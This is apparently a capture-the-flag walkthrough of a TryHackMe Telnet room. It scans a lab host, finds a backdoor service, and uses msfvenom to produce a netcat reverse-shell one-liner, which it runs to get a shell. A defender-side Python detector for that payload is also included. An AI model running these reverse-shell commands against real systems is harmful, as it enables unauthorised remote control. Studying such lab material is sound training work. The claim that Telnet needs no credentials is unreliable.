Telnet

Network Attack

If this service is running, it is a bright red flag that should be looked into immediately. Telnet does not require credentials. TryHackMe has a paid room that teaches Telnet.

https://tryhackme.com/room/networkservices

Telnet is an application protocol which allows the use of a telnet client to connect and execute commands on a remote machine that’s hosting a telnet server.

The telnet client will establish a connection with the server. The client then becomes a virtual terminal, allowing you to interact with the remote host.

Telnet sends all messages in clear text and has no specific security mechanisms. Telnet has been replaced by SSH in most production environments.

The user connects to the server by using the Telnet protocol. The user then executes commands on the server by using specific Telnet commands in the Telnet prompt. The following command is used to connect to a telnet service:

telnet [ip] [port]

Begin by running reconnaissance on the target machine:

sudo nmap -A -O -p- 10.10.147.86

PORT     STATE SERVICE VERSION
8012/tcp open  unknown
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NULL, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns:
|_    SKIDY’S BACKDOOR. Type .HELP to view commands

Why SKIDY, why???!!! Connect to it:

telnet 10.10.200.201 8012
Trying 10.10.200.201...
Connected to 10.10.200.201.
Escape character is '^]'.
SKIDY'S BACKDOOR. Type .HELP to view commands
ls -- nothing....
.HELP
.HELP: View commands
.RUN : Execute commands
.EXIT: Exit
.RUN whoami -- nothing....
.RUN ls  -- nothing....
.RUN ping 10.13.12.54 -c 1

# 10.13.12.54 is my attacking machine on tun0, the IP assigned by the VPN.

SWITCH TERMINALS
We’re going to generate a reverse shell payload using msfvenom. We don’t need tcpdump anymore, so kill it. Let’s set the lport environment variable for convenience (we have set lhost earlier). Then run msfvenom following the syntax in the task description to generate the payload.

export lport=4444
msfvenom -p cmd/unix/reverse_netcat lhost=$lhost lport=$lport R

Here is a more generic example to generate a reverse shell payload using msfvenom. This will generate and encode a netcat reverse shell for you.

msfvenom -p cmd/unix/reverse_netcat lhost=[local tun0 ip] lport=4444 R

-p = payload
lhost = our local host IP address (this is your machine’s IP address)
lport = the port to listen on (this is the port on your machine)
R = export the payload in raw format

msfvenom -p cmd/unix/reverse_netcat lhost=10.13.12.54 lport=4444 R
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 93 bytes
mkfifo /tmp/qdfcx; nc 10.13.12.54 4444 0</tmp/qdfcx | /bin/sh >/tmp/qdfcx 2>&1; rm /tmp/qdfcx
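As an added defender-side example (not part of the original walkthrough or the TryHackMe room), here is a small Python detector for the mkfifo/nc reverse-shell pattern that msfvenom printed above, run over a constructed sample of shell-history style lines:

```python
import re

# Structure of the cmd/unix/reverse_netcat payload shown above: create a named pipe,
# have nc read that pipe as stdin, feed nc's output into a shell, and send the shell's
# output back into the same pipe. The backreference (?P=fifo) ties the three uses together,
# which separates this from ordinary mkfifo usage in scripts.
REVERSE_NC_PATTERN = re.compile(
    r"mkfifo\s+(?P<fifo>\S+?)\s*;\s*"
    r"(?:nc|ncat|netcat)\s+(?P<host>\d{1,3}(?:\.\d{1,3}){3})\s+(?P<port>\d{1,5})\s+"
    r"0<\s*(?P=fifo)\s*\|\s*/bin/(?:ba)?sh(?:\s+-i)?\s*>\s*(?P=fifo)\s+2>&1"
)


def detect_reverse_shell(line):
    """Return the pipe path, callback host and port if the line carries the payload, else None."""
    m = REVERSE_NC_PATTERN.search(line)
    if not m:
        return None
    return {"fifo": m.group("fifo"), "host": m.group("host"), "port": int(m.group("port"))}


def scan_command_log(lines):
    """Return (line_number, finding) pairs for each matching line; line numbers are 1-based."""
    hits = []
    for n, line in enumerate(lines, start=1):
        finding = detect_reverse_shell(line)
        if finding:
            hits.append((n, finding))
    return hits


# Constructed sample command log (hypothetical shell-history / audit lines, not from the page).
SAMPLE_LOG = [
    "mkfifo /tmp/work.pipe; tar cf - /var/log > /tmp/work.pipe &",   # benign fifo use
    "nc -zv 10.0.0.5 443",                                            # benign port check
    ".RUN mkfifo /tmp/qdfcx; nc 10.13.12.54 4444 0</tmp/qdfcx | /bin/sh >/tmp/qdfcx 2>&1; rm /tmp/qdfcx",
    "mkfifo /tmp/f; nc 192.0.2.10 9001 0</tmp/f | /bin/bash -i >/tmp/f 2>&1; rm /tmp/f",
]

if __name__ == "__main__":
    for n, finding in scan_command_log(SAMPLE_LOG):
        print(f"line {n}: reverse shell to {finding['host']}:{finding['port']} via {finding['fifo']}")
```

The same regex can be dropped into a SIEM rule on command-line or auditd execve fields; the benign first line shows why matching on mkfifo alone would be too noisy.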

Perfect. We’re nearly there. Now all we need to do is start a netcat listener on our local machine. We do this using:

nc -lvp 4444

That sets up netcat to listen on port 4444. You should see:

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

Cool, now run that last line of msfvenom output back in the SKIDY'S BACKDOOR terminal, prefixed with .RUN:

.RUN mkfifo /tmp/qdfcx; nc 10.13.12.54 4444 0</tmp/qdfcx | /bin/sh >/tmp/qdfcx 2>&1; rm /tmp/qdfcx

Then it pops in the other terminal!

nc -lvp 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
ls
Ncat: Connection from 10.10.200.201.
Ncat: Connection from 10.10.200.201:55650.
flag.txt
